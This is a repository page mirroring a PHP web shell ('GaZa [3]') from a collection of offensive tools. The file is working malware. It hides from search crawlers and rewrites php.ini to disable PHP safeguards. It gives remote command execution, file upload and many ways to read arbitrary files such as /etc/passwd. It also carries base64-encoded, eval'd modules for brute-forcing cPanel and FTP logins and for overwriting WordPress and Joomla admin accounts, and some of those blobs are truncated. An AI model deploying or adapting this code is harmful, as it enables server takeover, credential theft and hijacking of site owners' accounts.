Mirrors/webshells
2
0
Fork 0
mirror of https://github.com/BlackArch/webshells synced 2024-11-22 11:53:05 +00:00
Code Issues Projects Releases Packages Wiki Activity
webshells/php/g3.php

1593 lines
164 KiB
PHP
Raw Normal View History

Initial commit
2015-01-12 22:32:48 +00:00
<?
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
error_reporting(0);
$function_tkl = $_POST['function_tkl'];
$pwd = $_POST['pwd'];
$dir = $_POST['dir'];
if ($dir == ''){
$dir = getcwd();
}
if ($gaza == 'ini'){
$fp = fopen("php.ini","w+");
fwrite($fp,"safe_mode = Off
disable_functions = NONE
open_basedir = OFF ");
}
if (!empty ($_FILES['gazaUP']))
{
move_uploaded_file($_FILES['gazaUP']['tmp_name'],$dir.'/'.$_FILES['gazaUP']['name']);
$gaza_text = "<b>Uploaded Successfully</b><br>file name : ".$_FILES['gazaUP']['name']."<br>file size : ".$_FILES['gazaUP']['size']."<br>file type : ".$_FILES['gazaUP']['type']."<br>";
}
if ($function_tkl == 'mysql'){
$gaza_text1 = "<form method='POST' align='center'>
<br>
:::Please enter your Database information:::
<br>Host Name:<input type='text' name='host_name' value='localhost' ><br>
User Name :<input type='text' name='user_name' ><br>
User Pass :<input type='text' name='user_pass' ><br>
Database Name :<input type='text' name='db_name' ><br>
File to Read :<input type='text' name='gaza_mysql_file' value='/etc/passwd'><br>
<input type='hidden' name='function_tkl' value='mysql1' ><br>
<input type='submit' value='Read' ><br>
</form>
";
}
if ($function_tkl == 'mysql1'){
$host_name = $_POST['host_name']; // e.g : localhost
$user_name = $_POST['user_name']; // e.g : gaza_hacker
$user_pass = $_POST['user_pass']; // e.g : 123456
$db_name = $_POST['db_name']; // e.g : tkl_3654654
$gaza_mysql_file = $_POST['gaza_mysql_file']; // e.g : /etc/passwd
$mysql_use = "yes";
$inquiry = array (
"USE $db_name",
'CREATE TEMPORARY TABLE ' . ($tkl_table = 'A'.time ()) . ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$gaza_mysql_file' INTO TABLE $tkl_table FIELDS "
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
. "ESCAPED BY '' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
"SELECT a FROM $tkl_table LIMIT 1"
);
mysql_connect ($host_name, $user_name, $user_pass);
foreach ($inquiry as $inquiry_info) {
$quiry = mysql_query ($inquiry_info);
if ($quiry == false) die (
"error: " . $inquiry_info . "\n" .
"error info: " . mysql_error () . "\n"
);
if (! $tkl_read = @mysql_fetch_array ($quiry, MYSQL_NUM)) continue;
$gaza_file = htmlspecialchars($tkl_read[0]);
mysql_free_result ($quiry);
}
}
function readFileTKL ($function_tkl,$pwd) {
switch($function_tkl){
case "show_source":
htmlspecialchars(show_source($pwd));
break;
case "readfile":
htmlspecialchars(readfile($pwd));
break;
case "include":
htmlspecialchars(include $pwd);
break;
case "fpassthru":
$fp = fopen($pwd, 'r');
htmlspecialchars(fpassthru($fp));
break;
case "file":
$output = file($pwd);
foreach( $output as $line )
{
echo htmlspecialchars($line . "\n");
}
break;
case "highlight_file":
htmlspecialchars(highlight_file($pwd));
break;
case "curl":
$tkl_cu =
curl_init("file:///".$pwd."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($tkl_cu);
htmlspecialchars(var_dump(curl_exec($tkl_cu)));
break;
case "posix_getpwuid":
for($uid=0;$uid<2000;$uid++){
$gaza_ar = posix_getpwuid($uid);
if (!empty($gaza_ar)) {
while (list ($key, $val) = each($gaza_ar)){
print "$val:";
}
print "\n";
}
}
break;
case "copy":
$tmp=tempnam($ooopo, "cx");
if(copy("compress.zlib://".$pwd, $tmp)){
$ioio = fopen($tmp, "r");
echo fread($ioio, filesize($tmp));
fclose($ioio);
unlink($tmp);
};
break;
case "fgets":
$handle = @fopen($pwd, "r");
if ($handle) {
while (($buffer = fgets($handle, 4096)) !== false) {
echo $gaza_file.$buffer;
}
fclose($handle);
}
break;
case "file_get_contents":
echo file_get_contents($pwd);
break;
case "fread":
$handle = fopen($pwd, "r");
echo fread($handle, filesize($pwd));
fclose($handle);
break;
case "stream_get_contents":
if ($stream = fopen($pwd, 'r')) {
echo stream_get_contents($stream, -1, 10);
fclose($stream);
}
break;
}
}
function exTKL() {
$in=$_POST['command'];
if (!$in == '') {
$out = '';
if (function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
} elseif (function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
} elseif (function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$out = shell_exec($in);
} elseif (is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
echo $out;
}
}
function hidTKL () {
echo "
<html>
<head>
<title>GaZa [3] ~!!</title>
<meta http-equiv='Content-Type' content='text/html; charset=windows-1256' />
<style>
body { background-color:#000000; color:#25ff00; font-family:Verdana; font-size:11px; }
h1,h3 { color:white; font-family:Verdana; font-size:11px; }
input,textarea,select,button { color: rgb(0, 190, 0); background-color:#444; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }
textarea { font-family:Courier; }
a { color:rgb(0, 190, 0); text-decoration:none; font-family:Verdana; font-size:11px; }
a:hover { color:rgb(0, 250, 0); }
td { font-size:12px; vertical-align:middle; }
th { font-size:13px; vertical-align:middle; }
table { empty-cells:show; }
.inf { color:#7F7F7F; }
</style>
<!--
###################################################################
# :'######::::::'###::::'########::::'###:::: #
# '##... ##::::'## ##:::..... ##::::'## ##::: #
# ##:::..::::'##:. ##:::::: ##::::'##:. ##:: #
# ##::'####:'##:::. ##:::: ##::::'##:::. ##: #
# ##::: ##:: #########::: ##::::: #########: #
# ##::: ##:: ##.... ##:: ##:::::: ##.... ##: #
# . ######::: ##:::: ##: ########: ##:::: ##: #
# :......::::..:::::..::........::..:::::..:: #
# '##::::'##::::'###:::::'######::'##:::'##:'########:'########::#
# ##:::: ##:::'## ##:::'##... ##: ##::'##:: ##.....:: ##.... ##:#
# ##:::: ##::'##:. ##:: ##:::..:: ##:'##::: ##::::::: ##:::: ##:#
# #########:'##:::. ##: ##::::::: #####:::: ######::: ########::#
# ##.... ##: #########: ##::::::: ##. ##::: ##...:::: ##.. ##:::#
# ##:::: ##: ##.... ##: ##::: ##: ##:. ##:: ##::::::: ##::. ##::#
# ##:::: ##: ##:::: ##:. ######:: ##::. ##: ########: ##:::. ##:#
# ..:::::..::..:::::..:::......:::..::::..::........::..:::::..::#
# '########:'########::::'###::::'##::::'##: #
# ... ##..:: ##.....::::'## ##::: ###::'###: #
# ::: ##:::: ##::::::::'##:. ##:: ####'####: #
# ::: ##:::: ######:::'##:::. ##: ## ### ##: #
# ::: ##:::: ##...:::: #########: ##. #: ##: #
# ::: ##:::: ##::::::: ##.... ##: ##:.:: ##: #
# ::: ##:::: ########: ##:::: ##: ##:::: ##: #
# :::..:::::........::..:::::..::..:::::..:: #
# WwW.Gaza-Hacker.NeT #
# GaZa [3] #
# Coded By TKL #
###################################################################
-->
</head>
<body>
<hr>
<form method='GET'>
<input type='submit' value='Home' size='10' >
<input type='submit' name='tool' value='Files' size='10' >
<input type='submit' name='tool' value='Bruteforce' size='10' >
<input type='submit' name='tool' value='bypass' size='10' >
<input type='submit' name='tool' value='SQL' size='10' >
<input type='submit' name='tool' value='symlink' size='10' >
<input type='submit' name='tool' value='Change-Admin' size='10' >
<input type='submit' name='tool' value='vBulletin-Tool' size='10' >
<input type='submit' name='tool' value='Server-Info' size='10' >
<input type='submit' name='tool' value='About' size='10' >
</form>
<hr>";
}
function fotTKL($gaza_text,$gaza_text1,$dir) {
echo "</textarea>
</td>
</tr>
<tr>
<td>
<left>
<form method='POST'>
<input type='text' name='dir' value= '".$dir."' size='30' >
<input type='submit' value='>>' size='10' >
</form>
</left>
</td>
<form method='POST'> <p>
<input type='text' name='command' />
<input type='submit' value='Execute' />
</p>
</form>
<td align='right' >
<form method='POST'> <p>
<input type='text' name='pwd' value='/etc/passwd' />
<select name='function_tkl'>
<option value='curl'>curl</option>
<option value='show_source'>show source</option>
<option value='stream_get_contents'>stream get contents</option>
<option value='readfile'>readfile</option>
<option value='include'>include</option>
<option value='fpassthru'>fpassthru</option>
<option value='fread'>fread</option>
<option value='file_get_contents'>file get contents</option>
<option value='file'>file</option>
<option value='fgets'>fgets</option>
<option value='copy'>copy</option>
<option value='highlight_file'>highlight file</option>
<option value='posix_getpwuid'>posix_getpwuid</option>
<option value='mysql'>MYsql</option>
</select>
<input type='submit' value='Read' />
</p>
</form>
</td>
</tr>
</table>
<hr>
<left>
<form method='POST' enctype='multipart/form-data'>
<input type='file' name='gazaUP' size='23' >
<input type='text' name='dir' value='".$dir."' >
<input type='submit' value='Upload' size='35' >
</form>
</left>
<table width='100%'>
<tr>
<td width='50%'>
".$gaza_text."
</td>
<td width='50%' >
".$gaza_text1."
</td>
</tr>
</table>
</body>
</html>";
}
function toolTKL () {
$tkl_tool = $_GET['tool'];
switch($tkl_tool){
case "About":
$tkl = "ZWNobyAiR2FaYSBTaGVsbCBWIDMgPGJyIC8+PGEgaHJlZj0naHR0cDovL2dhemEtaGFja2VyLm5ldCcgdGFyZ2V0PSdfYmxhbmsnPkdhemEgSGFDS2VSIFRlYW08L2E+PGJyIC8+IERldmVsb3BlZCBieSA8YSBocmVmPSdodHRwOi8vd3d3LmZhY2Vib29rLmNvbS9kci50a2wnIHRhcmdldD0nX2JsYW5rJz5US0w8L2E+IjsK";
eval(base64_decode($tkl));
exit;
case "SQL":
$tkl = "ZWNobyAiPHNjcmlwdD4gICAgIHZhciBwMV8gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AxJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AxJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBwMl8gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AyJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AyJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBwM18gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AzJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AzJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBkID0gZG9jdW1lbnQ7IAlmdW5jdGlvbiBzZXQoYSxjLHAxLHAyLHAzLGNoYXJzZXQpIHsgCQlpZihhIT1udWxsKWQubWYuYS52YWx1ZT1hO2Vsc2UgZC5tZi5hLnZhbHVlPWFfOyAJCWlmKGMhPW51bGwpZC5tZi5jLnZhbHVlPWM7ZWxzZSBkLm1mLmMudmFsdWU9Y187IAkJaWYocDEhPW51bGwpZC5tZi5wMS52YWx1ZT1wMTtlbHNlIGQubWYucDEudmFsdWU9cDFfOyAJCWlmKHAyIT1udWxsKWQubWYucDIudmFsdWU9cDI7ZWxzZSBkLm1mLnAyLnZhbHVlPXAyXzsgCQlpZihwMyE9bnVsbClkLm1mLnAzLnZhbHVlPXAzO2Vsc2UgZC5tZi5wMy52YWx1ZT1wM187IAkJaWYoY2hhcnNldCE9bnVsbClkLm1mLmNoYXJzZXQudmFsdWU9Y2hhcnNldDtlbHNlIGQubWYuY2hhcnNldC52YWx1ZT1jaGFyc2V0XzsgCX0gCWZ1bmN0aW9uIGcoYSxjLHAxLHAyLHAzLGNoYXJzZXQpIHsgCQlzZXQoYSxjLHAxLHAyLHAzLGNoYXJzZXQpOyAJCWQubWYuc3VibWl0KCk7IAl9ICA8L3NjcmlwdD4iOyAJY2xhc3MgRGJDbGFzcyB7IAkJdmFyICR0eXBlOyAJCXZhciAkbGluazsgCQl2YXIgJHJlczsgCQlmdW5jdGlvbiBEYkNsYXNzKCR0eXBlKQl7IAkJCSR0aGlzLT50eXBlID0gJHR5cGU7IAkJfSAJCWZ1bmN0aW9uIGNvbm5lY3QoJGhvc3QsICR1c2VyLCAkcGFzcywgJGRibmFtZSl7IAkJCXN3aXRjaCgkdGhpcy0+dHlwZSkJeyAJCQkJY2FzZSAnbXlzcWwnOiAJCQkJCWlmKCAkdGhpcy0+bGluayA9IEBteXNxbF9jb25uZWN0KCRob3N0LCR1c2VyLCRwYXNzLHRydWUpICkgcmV0dXJuIHRydWU7IAkJCQkJYnJlYWs7IAkJCQljYXNlICdwZ3NxbCc6IAkJCQkJJGhvc3QgPSBleHBsb2RlKCc6JywgJGhvc3QpOyAJCQkJCWlmKCEkaG9zdFsxXSkgJGhvc3RbMV09NTQzMjsgCQkJCQlpZiggJHRoaXMtPmxpbmsgPSBAcGdfY29ubmVjdCgiaG9zdD17JGhvc3RbMF19IHBvcnQ9eyRob3N0WzFdfSB1c2VyPSR1c2VyIHBhc3N3b3JkPSRwYXNzIGRibmFtZT0kZGJuYW1lIikgKSByZXR1cm4gdHJ1ZTsgCQkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIHNlbGVjdGRiKCRkYikgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlpZiAoQG15c3FsX3NlbGVjdF9kYigkZGIpKXJldHVybiB0cnVlOyAJCQkJCWJyZWFrOyAJCQl9IAkJCXJldHVybiBmYWxzZTsgCQl9IAkJZnVuY3Rpb24gcXVlcnkoJHN0cikgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpIHsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9IEBteXNxbF9xdWVyeSgkc3RyKTsgCQkJCQlicmVhazsgCQkJCWNhc2UgJ3Bnc3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9IEBwZ19xdWVyeSgkdGhpcy0+bGluaywkc3RyKTsgCQkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIGZldGNoKCkgeyAJCQkkcmVzID0gZnVuY19udW1fYXJncygpP2Z1bmNfZ2V0X2FyZygwKTokdGhpcy0+cmVzOyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gQG15c3FsX2ZldGNoX2Fzc29jKCRyZXMpOyAJCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiBAcGdfZmV0Y2hfYXNzb2MoJHJlcyk7IAkJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCQlmdW5jdGlvbiBsaXN0RGJzKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuICR0aGlzLT5xdWVyeSgiU0hPVyBkYXRhYmFzZXMiKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiAkdGhpcy0+cmVzID0gJHRoaXMtPnF1ZXJ5KCJTRUxFQ1QgZGF0bmFtZSBGUk9NIHBnX2RhdGFiYXNlIFdIRVJFIGRhdGlzdGVtcGxhdGUhPSd0JyIpOyAJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCQlmdW5jdGlvbiBsaXN0VGFibGVzKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9ICR0aGlzLT5xdWVyeSgnU0hPVyBUQUJMRVMnKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiAkdGhpcy0+cmVzID0gJHRoaXMtPnF1ZXJ5KCJzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hICE9ICdpbmZvcm1hdGlvbl9zY2hlbWEnIEFORCB0YWJsZV9zY2hlbWEgIT0gJ3BnX2NhdGFsb2cnIik7IAkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIGVycm9yKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gQG15c3FsX2Vycm9yKCk7IAkJCQlicmVhazsgCQkJCWNhc2UgJ3Bnc3FsJzogCQkJCQlyZXR1cm4gQHBnX2xhc3RfZXJyb3IoKTsgCQkJCWJyZWFrOyAJCQl9IAkJCXJldHVybiBmYWxzZTsgCQl9IAkJZnVuY3Rpb24gc2V0Q2hhcnNldCgkc3RyKSB7IAkJCXN3aXRjaCgkdGhpcy0+dHlwZSkJeyAJCQkJY2FzZSAnbXlzcWwnOiAJCQkJCWlmKGZ1bmN0aW9uX2V4aXN0cygnbXlzcWxfc2V0X2NoYXJzZXQnKSkgCQkJCQkJcmV0dXJuIEBteXNxbF9zZXRfY2hhcnNldCgkc3RyLCAkdGhpcy0+bGluayk7IAkJCQkJZWxzZSAJCQkJCQkkdGhpcy0
eval(base64_decode($tkl));
exit;
case "Change-Admin":
$tkl = "ZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj5TZWxlY3QgU2NyaXB0IFR5cGUgOiA8YnI+PHA+IAkJCTxzZWxlY3QgbmFtZT0iQ2hhbmdlLUFkbWluX3R5cGUiPiAJCQkJPG9wdGlvbiB2YWx1ZT0id3AiPldvcmRQcmVzczwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0iam9vbSI+Sm9vbWxhPC9vcHRpb24+IAkJCQk8b3B0aW9uIHZhbHVlPSJhcmFiIj5hcmFiIHBvcnRhbDwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0idmIiPnZCdWxsZXRpbjwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0icGhwYmIiPnBocEJCPC9vcHRpb24+IAkJCQk8b3B0aW9uIHZhbHVlPSJ3aG1jcyI+d2htY3M8L29wdGlvbj4gCQkJCTxvcHRpb24gdmFsdWU9InplbmNhcnQiPlplbiBDYXJ0PC9vcHRpb24+IAkJCQkJCQkJPC9zZWxlY3Q+IAkJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSI+PiIgLz4gCQkgCQkJPC9wPiAJCTwvZm9ybT4nOyAgIGlmICgkX1BPU1RbJ0NoYW5nZS1BZG1pbl90eXBlJ10gPT0gJ3dwJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+VGFibGUgUHJlZml4IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IndwXyIgbmFtZT0icHJlZml4IiB0eXBlPSJ0ZXh0Ij48YnI+IDxicj51c2VybmFtZSA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InVzZXJuYW1lIiB0eXBlPSJ0ZXh0Ij4gPGJyPnBhc3N3b3JkIDogPGJyPjxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIj48YnI+ICAgPGJyPjo6OldvcmRwcmVzcyBBZG1pbiBpbmZvOjo6IDxicj5OZXcgdXNlcm5hbWU6PGJyPiA8SU5QVVQgbmFtZT0iYWRtaW4iIHNpemU9IjE1IiB2YWx1ZT0iYWRtaW4iPjxicj4gTmV3IHBhc3N3b3JkOjxicj4gPElOUFVUIG5hbWU9InB3ZCIgc2l6ZT0iMTUiIHZhbHVlPSIxMjMxMjMiPjxicj4gTmV3IEVtYWlsOjxicj4gPElOUFVUIG5hbWU9ImVtYWlsIiBzaXplPSIxNSIgdmFsdWU9ImVtYWlsQHNpdGUuY29tIj48YnI+IDxJTlBVVCB2YWx1ZT0iY2hhbmdlIiBuYW1lPSJzZW5kIiB0eXBlPSJzdWJtaXQiPiA8L0ZPUk0+JzsgfSBpZiAoJF9QT1NUWydzZW5kJ10gPT0gJ2NoYW5nZScpeyAkbG9jYWxob3N0ID0gJF9QT1NUWydsb2NhbGhvc3QnXTsgJGRhdGFiYXNlICA9ICRfUE9TVFsnZGF0YWJhc2UnXTsgJHVzZXJuYW1lICA9ICRfUE9TVFsndXNlcm5hbWUnXTsgJHBhc3N3b3JkICA9ICRfUE9TVFsncGFzc3dvcmQnXTsgJHB3ZCAgID0gJF9QT1NUWydwd2QnXTsgJGFkbWluID0gJF9QT1NUWydhZG1pbiddOyAkU1FMID0gJF9QT1NUWydlbWFpbCddOyAkcHJlZml4ID0gJF9QT1NUWydwcmVmaXgnXTsgICBAbXlzcWxfY29ubmVjdCgkbG9jYWxob3N0LCR1c2VybmFtZSwkcGFzc3dvcmQpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgIEBteXNxbF9zZWxlY3RfZGIoJGRhdGFiYXNlKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICAkaGFzaCA9IGNyeXB0KCRwd2QpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfbG9naW4gPSciLiRhZG1pbi4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcl9wYXNzID0nIi4kaGFzaC4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcl9sb2dpbiA9JyIuJGFkbWluLiInIFdIRVJFIElEID0gMiIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VyX3Bhc3MgPSciLiRoYXNoLiInIFdIRVJFIElEID0gMiIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VyX2xvZ2luID0nIi4kYWRtaW4uIicgV0hFUkUgSUQgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfcGFzcyA9JyIuJGhhc2guIicgV0hFUkUgSUQgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfZW1haWwgPSciLiRTUUwuIicgV0hFUkUgSUQgPSAxIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgIGlmKCR0a2wpeyBlY2hvICI8Yj4gU3VjY2VzczwvYj4gIjsgfSAgfSBpZiAoJF9QT1NUWydDaGFuZ2UtQWRtaW5fdHlwZSddID09ICdqb29tJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+VGFibGUgUHJlZml4IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9Impvc18iIG5hbWU9InByZWZpeCIgdHlwZT0idGV4dCI+PGJyPiA8YnI+dXNlcm5hbWUgOiA8YnI+PElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJ1c2VybmFtZSIgdHlwZT0idGV4dCI+IDxicj5wYXNzd29yZCA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InBhc3N3b3JkIiB0eXBlPSJwYXNzd29yZCI+PGJyPiAgIDxicj46OjpKb29tbGEgQWRtaW4gaW5mbzo6OiA8YnI+TmV3IHVzZXJuYW1lOjxicj4gPElOUFVUIG5hbWU9ImFkbWluIiBzaXplPSIxNSIgdmFsdWU9ImFkbWluIj4
eval(base64_decode($tkl));
exit;
case "Bruteforce":
$tkl = "CiRjcGFuZWxfcG9ydD0iMjA4MiI7CiRjb25uZWN0X3RpbWVvdXQ9NTsKQGVycm9yX3JlcG9ydGluZygwKTsKc2V0X3RpbWVfbGltaXQoMCk7CiRzdWJtaXQ9JF9SRVFVRVNUWydzdWJtaXQnXTsKJHVzZXJzPSRfUkVRVUVTVFsndXNlcnMnXTsKJHBhc3M9JF9SRVFVRVNUWydwYXNzd29yZHMnXTsKJHRhcmdldD0kX1JFUVVFU1RbJ3RhcmdldCddOwokY3JhY2t0eXBlPSRfUkVRVUVTVFsnY3JhY2t0eXBlJ107CiR0YXJnZXQgPSAibG9jYWxob3N0IjsKCmVjaG8nCjxmb3JtICBtZXRob2Q9IlBPU1QiPgpVc2VycyBsaXN0ICZuYnNwOyAmbmJzcDsgJm5ic3A7ICAmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDsgJm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOyAmbmJzcDsmbmJzcDsmbmJzcDtQYXNzd29yZCBsaXN0PGJyPgo8dGV4dGFyZWEgcm93cz0iMjAiIG5hbWU9InVzZXJzIiBjb2xzPSIyNSI+Jy4kdXNlcnMuJzwvdGV4dGFyZWE+PHRleHRhcmVhIHJvd3M9IjIwIiBuYW1lPSJwYXNzd29yZHMiIGNvbHM9IjI1Ij4nLiRwYXNzLic8L3RleHRhcmVhPjxicj4KClNlbGVjdCBCcnV0ZWZvcmNlIFR5cGUgOiA8YnIvPjxwPgo8c2VsZWN0IG5hbWU9ImNyYWNrdHlwZSI+CjxvcHRpb24gdmFsdWU9ImNwYW5lbCI+Q1BhbmVsIENyYWNrPC9vcHRpb24+CjxvcHRpb24gdmFsdWU9ImZ0cCI+RlRQIENyYWNrPC9vcHRpb24+Cjwvc2VsZWN0Pgo8YnI+PCEtLVQuSy5MLS0+PGJyPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJDcmFjayIgbmFtZT0ic3VibWl0Ii8+CjwvcD48L2Zvcm0+JzsKCQkKaWYgKCRfUE9TVFsnY3JhY2t0eXBlJ109PSdmdHAnKXsKZnVuY3Rpb24gYnJ1dGUoKQp7CglnbG9iYWwgJHZhbHMsJG1pbl9sZW5ndGgsJG1heF9sZW5ndGg7CglnbG9iYWwgJHRhcmdldCwkcHVyZXVzZXIsJGNvbm5lY3RfdGltZW91dDsKCSRtaW49JG1pbl9sZW5ndGg7CgkkbWF4PSRtYXhfbGVuZ3RoOwoJJEEgPSBhcnJheSgpOwoJJG51bVZhbHMgPSBjb3VudCgkdmFscyk7CgkkaW5jRG9uZSA9ICIiOwoJJHJlYWxNYXggPSAiIjsKCSRjdXJyZW50VmFsID0gIiI7CgkkZmlyc3RWYWwgPSAiIjsKCWZvciAoJGkgPSAwOyAkaSA8ICgkbWF4ICsgMSk7ICRpKyspIHsKCQkkQVskaV0gPSAtMTsKCX0KCQoJZm9yICgkaSA9IDA7ICRpIDwgJG1heDsgJGkrKykgewoJCSRyZWFsTWF4ID0gJHJlYWxNYXggLiAkdmFsc1skbnVtVmFscyAtIDFdOwoJfQoJZm9yICgkaSA9IDA7ICRpIDwgJG1pbjsgJGkrKykgewoJCSRBWyRpXSA9ICR2YWxzWzBdOwoJfQoJJGkgPSAwOwoJd2hpbGUgKCRBWyRpXSAhPSAtMSkgewoJCSRmaXJzdFZhbCAuPSAkQVskaV07CgkJJGkrKzsKCX0KCWNwYW5lbF9jaGVjaygkdGFyZ2V0LCRwdXJldXNlciwkZmlyc3RWYWwsJGNvbm5lY3RfdGltZW91dCk7CgkKCXdoaWxlICgxKSB7CgkJZm9yICgkaSA9IDA7ICRpIDwgKCRtYXggKyAxKTsgJGkrKykgewoJCQlpZiAoJEFbJGldID09IC0xKSB7CgkJCQlicmVhazsKCQkJfQoJCX0